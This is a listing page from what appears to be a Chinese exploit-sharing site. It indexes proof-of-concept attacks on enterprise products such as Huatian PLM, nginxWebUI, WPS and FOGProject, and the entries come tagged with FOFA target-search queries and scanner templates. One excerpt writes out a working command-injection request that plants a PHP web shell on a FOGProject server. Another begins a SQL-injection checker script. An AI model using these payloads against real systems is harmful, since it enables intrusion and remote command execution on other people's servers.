POC 第28页
【2025特殊通用】华天软件Inforcenter PLM  文件读取_秃兔安全

【2025特殊通用】华天软件Inforcenter PLM 文件读取

fofa语句pocyaml已验证   
dreamer292的头像_秃兔安全至尊玉兔dreamer2923个月前
06014
【2025特殊通用】Easy7监控平台 downloadResource  文件读取_秃兔安全

【2025特殊通用】Easy7监控平台 downloadResource 文件读取

fofa语句yakit插件 uuidpocyaml已验证   
dreamer292的头像_秃兔安全至尊玉兔dreamer2923个月前
0725
【通用】WPS文档中心 etc-doperate 未授权访问_秃兔安全

【通用】WPS文档中心 etc-doperate 未授权访问

fofa语句yakit插件 uuidpocyaml懒得验证  
dreamer292的头像_秃兔安全至尊玉兔dreamer2922个月前
0759
【通用】 nginxWebUI getAuth 命令执行_秃兔安全

【通用】 nginxWebUI getAuth 命令执行

fofa语句yakit插件 uuidpocyakit yamlnuclei yaml已验证    
dreamer292的头像_秃兔安全至尊玉兔dreamer29211个月前
0989
fogproject系统接口export.php存在远程命令执行漏洞_秃兔安全

fogproject系统接口export.php存在远程命令执行漏洞

POST /fog/management/export.php?filename=$(echo+'<?php+echo+shell_exec($_GET[‘”‘cmd'”‘]);+?>’+>+lol.php)&type=pdf HTTP/1.1Host: 192.168.15.5Content-Length: 21Use...
秃兔的头像_秃兔安全至尊玉兔秃兔11个月前
0875
同享TXEHR V15人力管理管理平台DownloadFile存在任意文件下载漏洞_秃兔安全
金和OAC6-FileDownLoad.aspx任意文件读取漏洞_秃兔安全
⻜企互联loginService任意登录_秃兔安全
捷诚管理信息系统 SQL注入漏洞_秃兔安全

捷诚管理信息系统 SQL注入漏洞

import timeimport requests def verify(ip):url = f'{ip}EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx’headers = { 登录可见余下内容
秃兔的头像_秃兔安全至尊玉兔秃兔11个月前
01055
金万维-云联应用系统接入平台GNRemote.dll前台存在RCE漏洞_秃兔安全